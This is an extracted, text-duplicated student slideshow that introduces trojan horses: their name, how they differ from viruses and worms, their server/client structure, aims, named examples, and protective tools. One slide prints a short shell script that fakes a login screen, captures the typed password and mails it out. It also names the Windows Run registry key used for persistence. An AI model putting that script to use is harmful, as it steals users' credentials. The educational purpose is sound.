OUTLINE TROJAN What is trojan? How did trojan create? Why was its name trojan? What is the...

Preview:

Citation preview

OUTLINEOUTLINE

TROJANTROJAN What is trojan?What is trojan? How did trojan create?How did trojan create? Why was its name trojan?Why was its name trojan?

What is the differences with Trojan and other?What is the differences with Trojan and other? VirusVirus WormWorm TrojanTrojan

Trojan’s structureTrojan’s structure How does trojan run?How does trojan run?

How does trojen affect to operating system and file system?How does trojen affect to operating system and file system? Aim of the trojanAim of the trojan How is it give harm to the systemHow is it give harm to the system Types of trojanTypes of trojan

Protect your computerProtect your computer FirewallFirewall Anti-trojan programsAnti-trojan programs

NetbusterNetbuster Protector PlusProtector Plus

How can be cleanned?How can be cleanned?

Have you got any idea Have you got any idea about TROJAN?about TROJAN?

TROJANTROJAN

ProgrammeProgrammeSeems beneficial Seems beneficial giftgiftDamageDamage

Open/Find portOpen/Find port

Connect SystemConnect System

Control PcControl Pc

Why Why DidDid Trojan Create? Trojan Create?

Work at homeWork at home

19901990

Server – ClientServer – Client

Take DataTake Data

IllegalIllegal

TrojanTrojan Horse Horse

Truva horse was seem like a perfect

and beatifull gift

Something were not normal...

However they lose the war due to this brilliant strategy

DifferencesDifferences

VirusVirus

WormWorm

TrojanTrojan

What do you know about?What do you know about?

VirusVirus

WormWorm

VirusVirus

ProgrammeProgrammeMess theirseft to the Mess theirseft to the programmeprogrammeAttachAttachAttackAttack

HardwareHardwareSoftwareSoftware

WormWorm

ProgrammeProgramme

Attach AutomaticlyAttach Automaticly

Copy themselveCopy themselve

Send theirself without peopleSend theirself without people

TROJANTROJAN

ProgrammeProgramme

Has two partsHas two partsServer (in victams pc)Server (in victams pc)

Client (in hackers pc)Client (in hackers pc)

Trojan

Server.exe

Client.exe

How Does Trojan Work?How Does Trojan Work?

Send Server.exeSend Server.exeAttach to pictures,videos,mailAttach to pictures,videos,mail

Run Client.exeRun Client.exe

Connect computerConnect computer

Manage computer for its aimManage computer for its aim

OPERATING SYSTEMOPERATING SYSTEM&&

FILE SYSTEMFILE SYSTEM

Aim Of TrojanAim Of Trojan

How does it give harm to system ?How does it give harm to system ?

OPERATING SYSTEMOPERATING SYSTEM&&

FILE SYSTEMFILE SYSTEMRobberyRobbery

Net AccountNet Account

PasswordPassword

FileFile

FunFunPhysicalPhysical

SoftwareSoftware

VisualVisual

EspionageEspionage

OPERATING SYSTEMOPERATING SYSTEM&&

FILE SYSTEMFILE SYSTEM

Search FileSearch FileDelete FileDelete FileUse computer as a Use computer as a servantservantLock and Turn off Lock and Turn off WindowsWindows

Access System FileAccess System FileTake passwordTake passwordSend File,Take FileSend File,Take File

ExamplesExamples

ExamplesExamples

ExamplesExamples

ExamplesExamples

#! /bin/sh#! /bin/shclearclearcat /etc/issuecat /etc/issueecho -n "login: "echo -n "login: "read loginread loginecho -n "Password: "echo -n "Password: "stty -echostty -echoread passwdread passwdstty sanestty sanemail $USER <<- finmail $USER <<- finlogin: $loginlogin: $loginpasswd: $passwdpasswd: $passwdfinfinecho "Login incorrect"echo "Login incorrect"sleep 1sleep 1

logoutlogout

Type Of TrojanType Of Trojan

NetbusNetbus

Back ofriceBack ofrice

Girl FriendGirl Friend

Net MonitorNet Monitor

NETBUSNETBUSMost PopularMost Popular

BACK OFRICEBACK OFRICEMost HarmfulMost Harmful

GIRL FRIENDGIRL FRIENDMost DangerousMost Dangerous

NET MONITORNET MONITORSimillar with back NetbusSimillar with back Netbus

Type Of TrojanType Of Trojan

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run Curr entVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run Curr entVersion\Run

PROTECT YOUR COMPUTERPROTECT YOUR COMPUTER

FirewallFirewall

Anti-Trojan programsAnti-Trojan programsNetbusterNetbuster

Protector PlusProtector Plus

FirewallFirewall

Panda Antivirus + Panda Antivirus + FirewallFirewall

Norton Personal FirewallNorton Personal Firewall

NETBUSTERNETBUSTER

Two usage:Two usage:Protect computerProtect computer

Connect hacker’s Connect hacker’s computer and Send computer and Send messagemessage

PROTECT PLUSPROTECT PLUS

Find TrojanFind Trojan

Delete them Delete them

Give ReportGive Report

THANK S FOR LISTENING!THANK S FOR LISTENING!

Recommended